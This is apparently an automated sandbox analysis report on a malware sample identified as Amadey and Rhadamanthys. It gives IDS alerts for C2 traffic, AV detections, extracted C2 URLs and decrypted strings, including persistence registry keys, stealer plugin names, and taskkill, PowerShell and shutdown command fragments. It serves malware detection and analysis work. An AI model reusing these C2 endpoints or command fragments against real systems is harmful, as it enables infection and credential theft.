2025-03-12T18:02:46.510793+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	1432	192.168.2.5	49732	TCP
2025-03-12T18:03:03.197975+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	1432	192.168.2.5	49755	TCP
2025-03-12T18:03:12.898510+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	1432	192.168.2.5	49775	TCP
2025-03-12T18:03:15.236648+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	1432	192.168.2.5	49785	TCP
2025-03-12T18:03:22.337845+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	443	192.168.2.5	49795	TCP
2025-03-12T18:03:24.913382+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	1432	192.168.2.5	49798	TCP
2025-03-12T18:03:27.375076+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	1432	192.168.2.5	49800	TCP
2025-03-12T18:03:29.929182+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	443	192.168.2.5	49802	TCP
2025-03-12T18:03:33.277437+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	443	192.168.2.5	49804	TCP
2025-03-12T18:03:41.199591+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	443	192.168.2.5	49809	TCP
2025-03-12T18:03:42.093229+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	1432	192.168.2.5	49825	TCP
2025-03-12T18:03:48.317186+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	443	192.168.2.5	49828	TCP
2025-03-12T18:03:51.352963+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	1432	192.168.2.5	49831	TCP
2025-03-12T18:03:56.212593+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	443	192.168.2.5	49833	TCP
2025-03-12T18:04:03.011938+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	1432	192.168.2.5	49839	TCP
2025-03-12T18:04:04.442029+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	443	192.168.2.5	49838	TCP
2025-03-12T18:04:11.820035+0100	2854802	1	Domain Observed Used for C2 Detected	96.9.125.78	443	192.168.2.5	49843	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 9ua5N7dcBZ.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://45.93.20.224/pNdj30Vs11/index.php?scr=1	Avira URL Cloud: Label: malware
Source: http://45.93.20.224/pNdj30Vs11/index.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\readerupdate2[1].exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "45.93.20.224/pNdj30Vs11/index.php", "Version": "5.30", "Install Folder": "3140a3c17c", "Install File": "Gxtuum.exe"}
Source: rdha.exe.7092.15.memstrmin	Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://96.9.125.78:1432/c9c0a58659bbbb6615bc38c/pd8un5fd.jkuna"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\readerupdate2[1].exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\g2m.dll	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\g2m.dll	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\g2m.dll	ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: 9ua5N7dcBZ.exe	Virustotal: Detection: 54%			Perma Link
Source: 9ua5N7dcBZ.exe	ReversingLabs: Detection: 60%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 45.93.20.224
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /pNdj30Vs11/index.php
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: S-%lu-
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 3140a3c17c
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Gxtuum.exe
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Startup
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rundll32
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Programs
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: %USERPROFILE%
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cred.dll
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: clip.dll
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: http://
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: https://
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /quiet
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /Plugins/
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: &unit=
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shell32.dll
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: kernel32.dll
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ProgramData\
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: AVAST Software
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Kaspersky Lab
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Panda Security
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Doctor Web
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 360TotalSecurity
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Bitdefender
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Norton
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Sophos
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Comodo
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: WinDefender
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 0123456789
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ------
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ?scr=1
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ComputerName
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: -unicode-
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: VideoID
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ProductName
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: CurrentBuild
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rundll32.exe
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: "taskkill /f /im "
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: " && timeout 1 && del
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: && Exit"
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: " && ren
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Powershell.exe
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shutdown -s -t 0
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: random
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Keyboard Layout\Preload
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 00000419
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 00000422
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 00000423
Source: 00000001.00000002.1336747528.0000000002580000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 0000043f

Source: 9ua5N7dcBZ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49833 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 96.9.125.78:443 -> 192.168.2.5:49843 version: TLS 1.2

Source: 9ua5N7dcBZ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: g2m.pdb. source: 9ua5N7dcBZ.exe, 00000000.00000002.1324362118.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000001.00000003.1322613072.000000000077E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: rdha.exe, rdha.exe, 00000005.00000003.1459411737.00000000030A0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1459169276.0000000002810000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462490527.0000000005110000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462424813.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1619658698.0000000002840000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1619900415.0000000003100000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: g2m.pdb source: 9ua5N7dcBZ.exe, 00000000.00000002.1324362118.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000001.00000003.1322613072.000000000077E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: 9ua5N7dcBZ.exe, 00000000.00000002.1324362118.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, readerupdate2.exe, 00000004.00000002.1441967825.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, readerupdate2.exe, 0000000E.00000002.1601865876.00000000030B1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: rdha.exe, 00000005.00000003.1459630648.0000000003020000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1459821006.0000000003240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462888323.0000000005210000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462640595.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1620431709.00000000032A0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1620149862.0000000003080000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: rdha.exe, 00000005.00000003.1458189702.0000000003020000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1458377462.0000000003210000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1461869921.00000000051E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1461684888.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1613195494.0000000003080000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1613603143.0000000003270000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: rdha.exe, 00000005.00000003.1458868669.00000000031C0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1458694145.0000000003020000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462129411.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462265373.0000000005190000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1614206122.0000000003080000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1614595814.0000000003220000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: rdha.exe, 00000005.00000003.1458189702.0000000003020000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1458377462.0000000003210000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1461869921.00000000051E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1461684888.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1613195494.0000000003080000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1613603143.0000000003270000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: rdha.exe, 00000005.00000003.1458868669.00000000031C0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1458694145.0000000003020000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462129411.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462265373.0000000005190000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1614206122.0000000003080000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1614595814.0000000003220000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: my_new_hook_project.pdb source: readerupdate2.exe, 00000004.00000002.1441967825.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, readerupdate2.exe, 0000000E.00000002.1601865876.00000000030B1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: my_new_hook_project.pdb. source: readerupdate2.exe, 00000004.00000002.1441967825.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, readerupdate2.exe, 0000000E.00000002.1601865876.00000000030B1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: rdha.exe, 00000005.00000003.1459630648.0000000003020000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1459821006.0000000003240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462888323.0000000005210000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462640595.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1620431709.00000000032A0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1620149862.0000000003080000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: rdha.exe, 00000005.00000003.1459411737.00000000030A0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1459169276.0000000002810000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462490527.0000000005110000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462424813.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1619658698.0000000002840000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1619900415.0000000003100000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: 9ua5N7dcBZ.exe, 00000000.00000002.1324362118.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000001.00000002.1333508917.0000000000402000.00000002.00000001.01000000.00000006.sdmp, update.exe, 00000001.00000000.1322067460.0000000000402000.00000002.00000001.01000000.00000006.sdmp, Gxtuum.exe, 00000002.00000000.1329675124.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, Gxtuum.exe, 00000002.00000002.1336147979.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, Gxtuum.exe, 00000003.00000000.1344480910.0000000000402000.00000002.00000001.01000000.0000000A.sdmp, readerupdate2.exe, 00000004.00000002.1441967825.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, rdha.exe, 00000005.00000000.1440085861.0000000000402000.00000002.00000001.01000000.0000000E.sdmp, rdha.exe, 00000005.00000002.1461357764.0000000000402000.00000002.00000001.01000000.0000000E.sdmp, readerupdate2.exe, 0000000E.00000002.1601865876.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, rdha.exe, 0000000F.00000002.1622749776.0000000000402000.00000002.00000001.01000000.0000000E.sdmp, rdha.exe, 0000000F.00000000.1599769656.0000000000402000.00000002.00000001.01000000.0000000E.sdmp

Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
